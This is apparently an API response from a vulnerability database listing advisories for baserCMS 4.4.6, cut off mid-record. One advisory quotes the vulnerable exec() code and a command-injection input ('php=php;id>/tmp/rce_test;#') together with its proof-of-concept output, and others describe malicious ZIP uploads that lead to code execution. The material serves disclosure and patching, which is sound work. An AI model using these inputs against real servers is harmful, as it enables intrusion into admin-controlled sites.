Look up vulnerable packages by Package URL.

GET /api/packages/533055?format=api
HTTP 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "url": "http://public2.vulnerablecode.io/api/packages/533055?format=api",
    "purl": "pkg:composer/baserproject/basercms@4.4.6",
    "type": "composer",
    "namespace": "baserproject",
    "name": "basercms",
    "version": "4.4.6",
    "qualifiers": {},
    "subpath": "",
    "is_vulnerable": true,
    "next_non_vulnerable_version": "5.2.3",
    "latest_non_vulnerable_version": "5.2.3",
    "affected_by_vulnerabilities": [
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91611?format=api",
            "vulnerability_id": "VCID-3new-f12y-8bf9",
            "summary": "baserCMS has Unsafe File Upload Leading to Remote Code Execution (RCE)\n### Details\nThe application's restore function allows users to upload a `.zip` file, which is then automatically extracted. A PHP file inside the archive is included using `require_once` without validating or restricting the filename. An attacker can craft a malicious PHP file within the zip and achieve arbitrary code execution when it is included.\n\nVector: Malicious ZIP upload + insecure `require_once`\n\n### PoC\n1. Restore backup\n   ![image](https://github.com/user-attachments/assets/9e59768a-4a8e-472d-aaef-5d54546080f6)\n1. Load file shell (insecure `require_once`)\n   ![image](https://github.com/user-attachments/assets/8f7919a2-c7f3-4ae1-af6c-1b0057e4ba22)\n   ![image](https://github.com/user-attachments/assets/c10ef049-459d-429e-a608-8fb220c3387f)\n\n### Impact\nRemote Code Execution (RCE)",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-32957",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00031",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09459",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-32957"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_20837860",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_20837860"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-hv78-cwp4-8r7r",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-hv78-cwp4-8r7r"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32957",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32957"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-hv78-cwp4-8r7r",
                    "reference_id": "GHSA-hv78-cwp4-8r7r",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-hv78-cwp4-8r7r"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.2.3",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"
                }
            ],
            "aliases": [
                "CVE-2025-32957",
                "GHSA-hv78-cwp4-8r7r"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3new-f12y-8bf9"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91137?format=api",
            "vulnerability_id": "VCID-4zw8-truk-pugf",
            "summary": "baserCMS has OS Command Injection Leading to Remote Code Execution (RCE)\n## Summary\n\nIn the core update functionality of baserCMS, some parameters sent from the admin panel are passed to the `exec()` function without proper validation or escaping. This issue allows **an authenticated CMS administrator to execute arbitrary OS commands on the server (Remote Code Execution, RCE)**.\n\nThis vulnerability is not a UI-level issue such as screen manipulation or lack of CSRF protection, but rather stems from **a design that directly executes input values received on the server side as OS commands**. Therefore, even if buttons are hidden in the UI, or even if CakePHP's CSRF/FormProtection (SecurityComponent) ensures that only legitimate POST requests are accepted, **an attack is possible as long as a request containing a valid token is processed within an administrator session**.\n\n---\n\n## Vulnerability Information\n\n| Item | Details |\n| ---- | ------- |\n| CWE | CWE-78: Improper Neutralization of Special Elements used in an OS Command |\n| Impact | Remote Code Execution (RCE) |\n| Severity | Critical |\n| Attack Requirements | Administrator privileges required |\n| Reproducibility | Reproducible (confirmed multiple times) |\n| Test Environment | baserCMS 5.2.2 (Docker / development environment) |\n\n---\n\n## Affected Areas\n\n- **Controller**\n  - `PluginsController::get_core_update()`\n- **Service**\n  - `PluginsService::getCoreUpdate()`\n- **Affected Endpoint**\n  - `/baser/admin/baser-core/plugins/get_core_update`\n\n---\n\n## Technical Details\n\n### Vulnerable Code Flow\n\n```text\nPluginsController::get_core_update()\n  ↓ Retrieves php parameter from POST data\nPluginsService::getCoreUpdate($targetVersion, $php, $force)\n  ↓ Concatenates $php into command string without validation or escaping\nexec($command)\n```\n\n### Relevant Code (Excerpt)\n\n**PluginsController.php**\n\n```php\n$service->getCoreUpdate(\n    
$request->getData('targetVersion') ?? '',\n    $request->getData('php') ?? 'php',\n    $request->getData('force'),\n);\n```\n\n**PluginsService.php**\n\n```php\n$command = $php . ' ' . ROOT . DS . 'bin' . DS . 'cake.php composer ' .\n           $targetVersion . ' --php ' . $php . ' --dir ' . TMP . 'update';\n\nexec($command, $out, $code);\n```\n\nThe `$php` parameter is user input, and **none** of the following countermeasures are in place:\n\n- Restriction via allowlist\n- Validation via regular expression\n- Escaping via `escapeshellarg()` or similar\n\n---\n\n## Attack Scenario\n\n1. The attacker logs in as a CMS administrator\n2. Sends a POST request to the core update functionality in the admin panel\n3. Specifies a string containing OS commands in the `php` parameter\n4. `exec()` is executed on the server side, running the arbitrary OS command\n\n### Example Attack Input (Conceptual)\n\n```text\nphp=php;id>/tmp/rce_test;#\n```\n\n---\n\n## Verification Results (PoC)\n\n### Execution Result\n\n```bash\n$ docker exec bc-php cat /tmp/rce_test\nuid=1000(www-data) gid=1000(www-data) groups=1000(www-data)\n```\n\nThe above confirms that OS commands can be executed with `www-data` privileges.\n\n### Additional Notes\n\n- Reproducible through the legitimate flow in the admin panel (browser)\n- Succeeds even with CSRF/FormProtection tokens included in a legitimate request\n- Failure cases (400/403) have also been investigated and differentiated\n- Confirmed reproducible via resending HTTP requests with tools such as curl (resending the same request containing valid tokens)\n\n---\n\n## Impact\n\nIf this vulnerability is exploited, the following becomes possible:\n\n- Retrieval of server information\n- Reading/writing arbitrary files\n- Retrieval of application configuration information (DB credentials, etc.)\n- OS-level operations beyond application permission boundaries\n\nAlthough administrator privileges are required, **this is a design issue where the impact 
extends from the application layer to the OS layer**, and the impact is considered significant.\n\n---\n\n## Recommended Fix\n\n### Primary Recommendation\n\n- Do not accept the PHP executable path from user input\n- Fix the PHP executable on the server side using the `PHP_BINARY` constant\n\n```php\n$php = escapeshellarg(PHP_BINARY);\n```\n\n### Supplementary Fix Recommendations\n\n- Apply `escapeshellarg()` escaping to other command-line arguments (version number, directory, etc.) as well\n- If possible, consider using execution methods that do not involve shell interpretation (array format, Process class, etc.)\n\n### Alternative (Not Recommended)\n\n- Allowlist validation for the PHP executable path\n- Combined use of regex validation and `escapeshellarg()`\n\nHowever, **from the perspective of reducing the attack surface, a design that eliminates user input entirely is recommended**.\n\n---\n\n## Additional Notes\n\n- This issue is independent of UI display controls (showing/hiding buttons)\n- As long as the endpoint exists, an attack is possible if a request containing valid tokens is processed\n- This is a problem stemming from the design-level handling of input, and cannot be prevented by CSRF or UI controls alone\n\n---\n\n## Conclusion\n\nDue to a design issue in baserCMS's core update functionality where user input is passed to `exec()` without validation, **Remote Code Execution (RCE) is achievable with administrator privileges**. This vulnerability can be fixed through input validation and design review, and prompt remediation is recommended.\n\nThis advisory was translated from Japanese to English using GitHub Copilot.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-21861",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00131",
                            "scoring_system": "epss",
                            "scoring_elements": "0.32198",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-21861"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_20837860",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_20837860"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-qxmc-6f24-g86g",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-qxmc-6f24-g86g"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21861",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21861"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-qxmc-6f24-g86g",
                    "reference_id": "GHSA-qxmc-6f24-g86g",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-qxmc-6f24-g86g"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.2.3",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"
                }
            ],
            "aliases": [
                "CVE-2026-21861",
                "GHSA-qxmc-6f24-g86g"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4zw8-truk-pugf"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/41774?format=api",
            "vulnerability_id": "VCID-5ay3-1t5g-vycu",
            "summary": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')\nBaserCMS is an open source content management system with a focus on Japanese language support. Users with upload privilege may upload crafted zip files capable of path traversal on the host operating system. This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-41279",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00438",
                            "scoring_system": "epss",
                            "scoring_elements": "0.6349",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00438",
                            "scoring_system": "epss",
                            "scoring_elements": "0.63447",
                            "published_at": "2026-06-04T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-41279"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/commit/d8ab0a81a7bce35cc95ff7dff851a7e87a084336",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/commit/d8ab0a81a7bce35cc95ff7dff851a7e87a084336"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41279",
                    "reference_id": "CVE-2021-41279",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41279"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-4x2f-54wr-4hjg",
                    "reference_id": "GHSA-4x2f-54wr-4hjg",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-4x2f-54wr-4hjg"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-4x2f-54wr-4hjg",
                    "reference_id": "GHSA-4x2f-54wr-4hjg",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-4x2f-54wr-4hjg"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/59671?format=api",
                    "purl": "pkg:composer/baserproject/basercms@4.5.4",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-ays7-6wvh-augt"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-g56w-z9cx-5ygv"
                        },
                        {
                            "vulnerability": "VCID-ggv8-3v9t-mfea"
                        },
                        {
                            "vulnerability": "VCID-j37y-gws9-ake9"
                        },
                        {
                            "vulnerability": "VCID-jby7-s5ez-dqb3"
                        },
                        {
                            "vulnerability": "VCID-k575-suuf-7bhf"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-khft-xvrw-g3dr"
                        },
                        {
                            "vulnerability": "VCID-kmpp-6j49-pqfz"
                        },
                        {
                            "vulnerability": "VCID-mfm9-gsh3-ubg8"
                        },
                        {
                            "vulnerability": "VCID-nxrf-64er-xbfx"
                        },
                        {
                            "vulnerability": "VCID-p695-t9ye-v3ga"
                        },
                        {
                            "vulnerability": "VCID-pd8c-9d7z-zkhg"
                        },
                        {
                            "vulnerability": "VCID-sqr4-v889-tff8"
                        },
                        {
                            "vulnerability": "VCID-u16w-rbuk-ybfs"
                        },
                        {
                            "vulnerability": "VCID-uedz-j2vn-cbea"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        },
                        {
                            "vulnerability": "VCID-zsgc-fnen-b7a6"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.5.4"
                }
            ],
            "aliases": [
                "CVE-2021-41279",
                "GHSA-4x2f-54wr-4hjg"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5ay3-1t5g-vycu"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91016?format=api",
            "vulnerability_id": "VCID-7x3n-4c2b-nfbx",
            "summary": "baserCMS has OS command injection vulnerability in installer\nbaserCMS has an OS command injection vulnerability in the installer.\n\n### Target\nbaserCMS 5.2.2 and earlier versions\n\n### Vulnerability\n\nIf baserCMS is placed on a server but not installed, malicious commands may be executed.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page to reference for more information.\nhttps://basercms.net/security/JVN_54513170\n\n### Credits\n\nREN XINGDIAN",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30880",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00055",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17526",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30880"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_20837860",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_20837860"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30880",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30880"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-6hpg-8rx3-cwgv",
                    "reference_id": "GHSA-6hpg-8rx3-cwgv",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-6hpg-8rx3-cwgv"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.2.3",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"
                }
            ],
            "aliases": [
                "CVE-2026-30880",
                "GHSA-6hpg-8rx3-cwgv"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7x3n-4c2b-nfbx"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/41773?format=api",
            "vulnerability_id": "VCID-891u-x525-ykbb",
            "summary": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')\nThere is a potential Zip Slip vulnerability and an OS command injection vulnerability in the management system of baserCMS. Users with permissions to upload files may upload crafted zip files which may execute arbitrary commands on the host operating system. This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users. If you are eligible, please update to the new version as soon as possible.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-41243",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.02799",
                            "scoring_system": "epss",
                            "scoring_elements": "0.86405",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.02799",
                            "scoring_system": "epss",
                            "scoring_elements": "0.86382",
                            "published_at": "2026-06-04T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-41243"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/commit/9088b99c329d1faff3a2f1269f37b9a9d8d5f6ff",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/commit/9088b99c329d1faff3a2f1269f37b9a9d8d5f6ff"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41243",
                    "reference_id": "CVE-2021-41243",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41243"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-7rpc-9m88-cf9w",
                    "reference_id": "GHSA-7rpc-9m88-cf9w",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-7rpc-9m88-cf9w"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-7rpc-9m88-cf9w",
                    "reference_id": "GHSA-7rpc-9m88-cf9w",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-7rpc-9m88-cf9w"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/59671?format=api",
                    "purl": "pkg:composer/baserproject/basercms@4.5.4",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
